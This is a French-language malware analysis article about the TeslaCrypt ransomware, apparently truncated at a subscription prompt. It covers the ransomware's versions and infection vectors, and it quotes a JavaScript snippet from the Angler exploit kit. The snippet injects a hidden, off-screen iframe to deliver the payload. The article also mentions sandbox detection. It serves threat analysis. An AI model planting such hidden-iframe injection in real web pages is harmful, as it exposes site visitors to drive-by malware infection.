Début 2015, un nouveau rançongiciel a vu le jour : TeslaCrypt. Ce malware a tout d'abord ciblé des machines avec certains jeux vidéo spécifiques installés pour aujourd'hui cibler tout type de machine sous Windows. En mai 2015, des chercheurs (http://blogs.cisco.com/security/talos/teslacrypt) ont trouvé une faiblesse dans l'implémentation du déchiffrement des fichiers. Peu après cette découverte, les développeurs du malware ont implémenté une version 2.0 du rançongiciel corrigeant leur erreur. Aujourd'hui, nous sommes à la version 3.0 de ce code.
1. Vecteurs d'infections
Les auteurs de TeslaCrypt ont diversifié les vecteurs d'infections du malware au fil des mois. Nous allons brièvement voir 2 cas.
1.1 Exploit kit : Angler
En mars 2015, les auteurs ont utilisé un Exploit Kit afin de diffuser leur malware. Cet exploit kit pouvait utiliser la vulnérabilité Flash CVE-2015-0311 dans le but d’exécuter un binaire TeslaCrypt ciblant les navigateurs Internet Explorer et Opera.
Une iframe était alors créée :
setTimeout(
function(){
var d = document.createElement('div');
d.id='counter_value';
d.style.position='absolute';
d.style.left='700px';
d.style.top='-1000px';
d.innerHTML='<iframe src="http://url"></iframe';
document.body.appendChild(d)},55);
L'Exploit Kit vérifiait également la présence d'outil de sécurité, ou de sandbox via Microsoft.XMLDOM. Voici par exemple la détection de l'outil de virtualisation...
- Accédez à tous les contenus de Connect en illimité
- Découvrez des listes de lecture et des contenus Premium
- Consultez les nouveaux articles en avant-première